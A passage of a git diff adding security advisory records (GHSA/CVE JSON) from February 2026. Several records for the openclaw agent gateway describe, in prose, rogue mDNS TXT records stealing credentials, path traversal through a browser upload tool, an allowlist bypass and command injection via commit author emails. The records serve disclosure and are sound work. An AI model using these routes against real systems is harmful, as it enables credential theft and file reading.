remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2623" + }, + { + "type": "WEB", + "url": "https://fx4tqqfvdw4.feishu.cn/docx/WmA3dzNfto3AxlxoFlqcu5amnXe" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346274" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346274" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.751988" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T22:18:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jm7g-jgq2-cxf3/GHSA-jm7g-jgq2-cxf3.json b/advisories/unreviewed/2026/02/GHSA-jm7g-jgq2-cxf3/GHSA-jm7g-jgq2-cxf3.json new file mode 100644 index 0000000000000..ba39801f9c8d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jm7g-jgq2-cxf3/GHSA-jm7g-jgq2-cxf3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jm7g-jgq2-cxf3", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2025-13333" + ], + "details": "IBM WebSphere Application Server 9.0, and 8.5 could provide weaker than expected security during system administration of security settings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13333" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260217" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-358" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T23:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mw8p-6vj4-pvjr/GHSA-mw8p-6vj4-pvjr.json b/advisories/unreviewed/2026/02/GHSA-mw8p-6vj4-pvjr/GHSA-mw8p-6vj4-pvjr.json new file mode 100644 index 0000000000000..cc13fff277ba4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mw8p-6vj4-pvjr/GHSA-mw8p-6vj4-pvjr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mw8p-6vj4-pvjr", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2025-36183" + ], + "details": "IBM watsonx.data 2.2 through 2.2.1 IBM Lakehouse could allow a privileged user to upload malicious files that could be executed server to modify limited files or data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36183" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260118" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T22:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pgcw-657p-x286/GHSA-pgcw-657p-x286.json b/advisories/unreviewed/2026/02/GHSA-pgcw-657p-x286/GHSA-pgcw-657p-x286.json new file mode 100644 index 0000000000000..df52a38062973 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pgcw-657p-x286/GHSA-pgcw-657p-x286.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pgcw-657p-x286", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-1344" + ], + "details": "Tanium addressed an insecure file permissions vulnerability in Enforce Recovery Key Portal.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1344" + }, + { + "type": "WEB", + "url": "https://security.tanium.com/TAN-2026-003" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T00:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pp6p-hwf9-pcpx/GHSA-pp6p-hwf9-pcpx.json b/advisories/unreviewed/2026/02/GHSA-pp6p-hwf9-pcpx/GHSA-pp6p-hwf9-pcpx.json new file mode 100644 index 0000000000000..2a1ec8942870d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pp6p-hwf9-pcpx/GHSA-pp6p-hwf9-pcpx.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp6p-hwf9-pcpx", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-2627" + ], + "details": "A security flaw has been discovered in Softland FBackup up to 9.9. This impacts an unknown function in the library C:\\Program Files\\Common Files\\microsoft shared\\ink\\HID.dll of the component Backup/Restore. The manipulation results in link following. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2627" + }, + { + "type": "WEB", + "url": "https://github.com/thezdi/PoC/tree/main/FilesystemEoPs" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346279" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346279" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752050" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T22:18:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json b/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json new file mode 100644 index 0000000000000..0242e02b8a189 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q543-x74m-r8q9", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-22048" + ], + "details": "StorageGRID (formerly StorageGRID Webscale) versions prior to 11.9.0.12 and 12.0.0.4 with Single Sign-on enabled and configured to use Microsoft Entra ID (formerly Azure AD) as an IdP are susceptible to a Server-Side Request Forgery (SSRF) vulnerability. Successful exploit could allow an authenticated attacker with low privileges to delete configuration data or deny access to some resources.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22048" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/NTAP-20260217-0001" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T00:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qvc7-4wrw-mpgp/GHSA-qvc7-4wrw-mpgp.json b/advisories/unreviewed/2026/02/GHSA-qvc7-4wrw-mpgp/GHSA-qvc7-4wrw-mpgp.json new file mode 100644 index 0000000000000..d45661ae5dd5e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qvc7-4wrw-mpgp/GHSA-qvc7-4wrw-mpgp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvc7-4wrw-mpgp", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2023-38005" + ], + "details": "IBM Cloud Pak System 2.3.3.6, 2.3.3.7, 2.3.4.0, 2.3.4.1, and 2.3.5.0 could allow an authenticated user to perform unauthorized tasks due to improper access controls.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38005" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259955" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T22:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vfjm-qj84-h7cw/GHSA-vfjm-qj84-h7cw.json b/advisories/unreviewed/2026/02/GHSA-vfjm-qj84-h7cw/GHSA-vfjm-qj84-h7cw.json new file mode 100644 index 0000000000000..d7ab563087612 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vfjm-qj84-h7cw/GHSA-vfjm-qj84-h7cw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfjm-qj84-h7cw", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2025-33088" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 could allow a local user with specific knowledge about the system's architecture to escalate their privileges due to incorrect file permissions for critical resources.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33088" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260161" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T22:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w5xc-rm8g-jf7m/GHSA-w5xc-rm8g-jf7m.json b/advisories/unreviewed/2026/02/GHSA-w5xc-rm8g-jf7m/GHSA-w5xc-rm8g-jf7m.json new file mode 100644 index 0000000000000..fefbd0aca2b05 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w5xc-rm8g-jf7m/GHSA-w5xc-rm8g-jf7m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w5xc-rm8g-jf7m", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-26119" + ], + "details": "Improper authentication in Windows Admin Center allows an authorized attacker to elevate privileges over a network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26119" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26119" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T23:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wprr-57fw-46wj/GHSA-wprr-57fw-46wj.json b/advisories/unreviewed/2026/02/GHSA-wprr-57fw-46wj/GHSA-wprr-57fw-46wj.json new file mode 100644 index 0000000000000..231ed8ee9fb52 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wprr-57fw-46wj/GHSA-wprr-57fw-46wj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wprr-57fw-46wj", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2025-13689" + ], + "details": "IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute arbitrary commands and gain access to sensitive information due to unrestricted file uploads.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13689" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259958" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T23:16:18Z" + } +} \ No newline at end of file From a0993d7818d2f88564971574361b9791fc564ecf Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 00:35:10 +0000 Subject: [PATCH 141/215] Publish GHSA-pv58-549p-qh99 --- .../GHSA-pv58-549p-qh99.json | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-pv58-549p-qh99/GHSA-pv58-549p-qh99.json diff --git a/advisories/github-reviewed/2026/02/GHSA-pv58-549p-qh99/GHSA-pv58-549p-qh99.json b/advisories/github-reviewed/2026/02/GHSA-pv58-549p-qh99/GHSA-pv58-549p-qh99.json new file mode 100644 index 0000000000000..99305b3a46463 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-pv58-549p-qh99/GHSA-pv58-549p-qh99.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pv58-549p-qh99", + "modified": "2026-02-18T00:33:35Z", + "published": "2026-02-18T00:33:35Z", + "aliases": [ + "CVE-2026-26327" + ], + "summary": "OpenClaw allows unauthenticated discovery TXT records could steer routing and TLS pinning", + "details": "## Summary\n\nDiscovery beacons (Bonjour/mDNS and DNS-SD) include TXT records such as `lanHost`, `tailnetDns`, `gatewayPort`, and `gatewayTlsSha256`. TXT records are unauthenticated.\n\nPrior to the fix, some clients treated TXT values as authoritative routing/pinning inputs:\n\n- iOS and macOS: used TXT-provided host hints (`lanHost`/`tailnetDns`) and ports (`gatewayPort`) to build the connection URL.\n- iOS and Android: allowed the discovery-provided TLS fingerprint (`gatewayTlsSha256`) to override a previously stored TLS pin.\n\nOn a shared/untrusted LAN, an attacker could advertise a rogue `_openclaw-gw._tcp` service. This could cause a client to connect to an attacker-controlled endpoint and/or accept an attacker certificate, potentially exfiltrating Gateway credentials (`auth.token` / `auth.password`) during connection.\n\n## Distribution / Exposure\n\nThe iOS and Android apps are currently alpha/not broadly shipped (no public App Store / Play Store release). Practical impact is primarily limited to developers/testers running those builds, plus any other shipped clients relying on discovery on a shared/untrusted LAN.\n\nCVSS can still be used for the technical (base) severity of the bug; limited distribution primarily affects environmental risk.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `<= 2026.2.13` (latest published on npm as of 2026-02-14)\n- Patched: planned for `>= 2026.2.14` (not yet published at time of writing)\n\n## Fix\n\n- Clients now prefer the resolved service endpoint (SRV + A/AAAA) over TXT-provided routing hints.\n- Discovery-provided fingerprints no longer override stored TLS pins.\n- iOS/Android: first-time TLS pins require explicit user confirmation (fingerprint shown; no silent TOFU).\n- iOS/Android: discovery-based direct connects are TLS-only.\n- Android: hostname verification is no longer globally disabled (only bypassed when pinning).\n\n## Fix Commit(s)\n\n- d583782ee322a6faa1fe87ae52455e0d349de586\n\n## Credits\n\nThanks @simecek for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-pv58-549p-qh99" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/d583782ee322a6faa1fe87ae52455e0d349de586" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:33:35Z", + "nvd_published_at": null + } +} \ No newline at end of file From d3a1d6252329c176679746176992d9f2b1cf4b70 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 00:45:53 +0000 Subject: [PATCH 142/215] Publish GHSA-g34w-4xqq-h79m --- .../GHSA-g34w-4xqq-h79m.json | 85 +++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-g34w-4xqq-h79m/GHSA-g34w-4xqq-h79m.json diff --git a/advisories/github-reviewed/2026/02/GHSA-g34w-4xqq-h79m/GHSA-g34w-4xqq-h79m.json b/advisories/github-reviewed/2026/02/GHSA-g34w-4xqq-h79m/GHSA-g34w-4xqq-h79m.json new file mode 100644 index 0000000000000..baed442e321ac --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-g34w-4xqq-h79m/GHSA-g34w-4xqq-h79m.json @@ -0,0 +1,85 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g34w-4xqq-h79m", + "modified": "2026-02-18T00:43:54Z", + "published": "2026-02-18T00:43:54Z", + "aliases": [ + "CVE-2026-26328" + ], + "summary": "OpenClaw iMessage group allowlist authorization inherited DM pairing-store identities", + "details": "## Summary\nUnder iMessage `groupPolicy=allowlist`, group authorization could be satisfied by sender identities coming from the DM pairing store, broadening DM trust into group contexts.\n\n## Details\nAffected component: `src/imessage/monitor/monitor-provider.ts`.\n\nVulnerable logic derived `effectiveGroupAllowFrom` using both the static group allowlist and DM pairing-store identities (`storeAllowFrom`). This allowed a sender approved via DM pairing to satisfy group authorization in groups even if the sender/chat was not explicitly present in `groupAllowFrom`.\n\nThis weakens boundary separation between DM pairing and group allowlist authorization.\n\n## Affected Packages / Versions\n- `openclaw` (npm): affected `<= 2026.2.13`\n- `clawdbot` (npm): affected `<= 2026.1.24-3`\n\n## Fix Commit(s)\n- `openclaw/openclaw@872079d42fe105ece2900a1dd6ab321b92da2d59`\n- `openclaw/openclaw@90d1e9cd71419168b2faa54a759b124a3eacfae7`\n\nThanks @vincentkoc for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "clawdbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g34w-4xqq-h79m" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/872079d42fe105ece2900a1dd6ab321b92da2d59" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284", + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:43:54Z", + "nvd_published_at": null + } +} \ No newline at end of file From 472841114a6ab4ea962d3dd18a30d614fc1838e9 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 00:48:39 +0000 Subject: [PATCH 143/215] Publish Advisories GHSA-cv7m-c9jx-vg7q GHSA-m7x8-2w3w-pr42 --- .../GHSA-cv7m-c9jx-vg7q.json | 65 +++++++++++++++++++ .../GHSA-m7x8-2w3w-pr42.json | 65 +++++++++++++++++++ 2 files changed, 130 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-cv7m-c9jx-vg7q/GHSA-cv7m-c9jx-vg7q.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-m7x8-2w3w-pr42/GHSA-m7x8-2w3w-pr42.json diff --git a/advisories/github-reviewed/2026/02/GHSA-cv7m-c9jx-vg7q/GHSA-cv7m-c9jx-vg7q.json b/advisories/github-reviewed/2026/02/GHSA-cv7m-c9jx-vg7q/GHSA-cv7m-c9jx-vg7q.json new file mode 100644 index 0000000000000..13049c6558246 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-cv7m-c9jx-vg7q/GHSA-cv7m-c9jx-vg7q.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cv7m-c9jx-vg7q", + "modified": "2026-02-18T00:46:49Z", + "published": "2026-02-18T00:46:49Z", + "aliases": [ + "CVE-2026-26329" + ], + "summary": "OpenClaw has a path traversal in browser upload allows local file read", + "details": "## Summary\n\nAuthenticated attackers can read arbitrary files from the Gateway host by supplying absolute paths or path traversal sequences to the browser tool's `upload` action. The server passed these paths to Playwright's `setInputFiles()` APIs without restricting them to a safe root.\n\nSeverity remains **High** due to the impact (arbitrary local file read on the Gateway host), even though exploitation requires authenticated access.\n\n## Exploitability / Preconditions\n\nThis is not a \"drive-by\" issue.\n\nAn attacker must:\n\n- Reach the Gateway HTTP surface (or otherwise invoke the same browser control hook endpoints).\n- Present valid Gateway auth (bearer token / password), as required by the Gateway configuration.\n - In common default setups, the Gateway binds to loopback and the onboarding wizard generates a gateway token even for loopback.\n- Have the `browser` tool permitted by tool policy for the target session/context (and have browser support enabled).\n\nIf an operator exposes the Gateway beyond loopback (LAN/tailnet/custom bind, reverse proxy, tunnels, etc.), the impact increases accordingly.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Vulnerable: `< 2026.2.14` (includes latest published `2026.2.13`)\n- Patched: `>= 2026.2.14` (planned next release)\n\n## Details\n\n**Entry points**:\n\n- `POST /tools/invoke` with `{\"tool\":\"browser\",\"action\":\"upload\",...}`\n- `POST /hooks/file-chooser` (browser control hook)\n\nWhen the upload paths are not validated, Playwright reads the referenced files from the local filesystem and attaches them to a page-level ``. Contents can then be exfiltrated by page JavaScript (e.g. via `FileReader`) or via agent/browser snapshots.\n\nImpact: arbitrary local file read on the Gateway host (confidentiality impact).\n\n## Fix\n\nUpload paths are now confined to OpenClaw's temp uploads root (`DEFAULT_UPLOAD_DIR`) and traversal/escape paths are rejected.\n\nThis fix was implemented internally; the reporter provided a clear reproduction and impact analysis.\n\nFix commit(s):\n\n- 3aa94afcfd12104c683c9cad81faf434d0dadf87\n\nThanks @p80n-sec for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cv7m-c9jx-vg7q" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/3aa94afcfd12104c683c9cad81faf434d0dadf87" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:46:49Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-m7x8-2w3w-pr42/GHSA-m7x8-2w3w-pr42.json b/advisories/github-reviewed/2026/02/GHSA-m7x8-2w3w-pr42/GHSA-m7x8-2w3w-pr42.json new file mode 100644 index 0000000000000..c9d8eb065fc3b --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-m7x8-2w3w-pr42/GHSA-m7x8-2w3w-pr42.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m7x8-2w3w-pr42", + "modified": "2026-02-18T00:46:55Z", + "published": "2026-02-18T00:46:54Z", + "aliases": [ + "CVE-2026-26323" + ], + "summary": "OpenClaw has a command injection in maintainer clawtributors updater", + "details": "### Summary\nCommand injection in the maintainer/dev script `scripts/update-clawtributors.ts`.\n\n### Impact\nAffects contributors/maintainers (or CI) who run `bun scripts/update-clawtributors.ts` in a source checkout that contains a malicious commit author email (e.g. crafted `@users.noreply.github.com` values).\n\nNormal CLI usage is not affected (`npm i -g openclaw`): this script is not part of the shipped CLI and is not executed during routine operation.\n\n### Affected Versions\n- Source checkouts: tags `v2026.1.8` through `v2026.2.13` (inclusive)\n- Version range (structured): `>= 2026.1.8, < 2026.2.14`\n\n### Details\nThe script derived a GitHub login from `git log` author metadata and interpolated it into a shell command (via `execSync`). A malicious commit record could inject shell metacharacters and execute arbitrary commands when the script is run.\n\n### Fix\n- Fix commit: `a429380e337152746031d290432a4b93aa553d55`\n- Planned patched version: `2026.2.14`\n\n### Credits\nThanks @scanleale and @MegaManSec (https://joshua.hu) of [AISLE Research Team](https://aisle.com/) for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.1.8" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m7x8-2w3w-pr42" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/a429380e337152746031d290432a4b93aa553d55" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:46:54Z", + "nvd_published_at": null + } +} \ No newline at end of file From acf99cc477597df3901d4074a43116284ef17097 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 00:52:58 +0000 Subject: [PATCH 144/215] Publish Advisories GHSA-j27p-hq53-9wgc GHSA-v773-r54f-q32w GHSA-xvhf-x56f-2hpp --- .../GHSA-j27p-hq53-9wgc.json | 59 +++++++++++++++++ .../GHSA-v773-r54f-q32w.json | 63 +++++++++++++++++++ .../GHSA-xvhf-x56f-2hpp.json | 63 +++++++++++++++++++ 3 files changed, 185 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-j27p-hq53-9wgc/GHSA-j27p-hq53-9wgc.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-v773-r54f-q32w/GHSA-v773-r54f-q32w.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-xvhf-x56f-2hpp/GHSA-xvhf-x56f-2hpp.json diff --git a/advisories/github-reviewed/2026/02/GHSA-j27p-hq53-9wgc/GHSA-j27p-hq53-9wgc.json 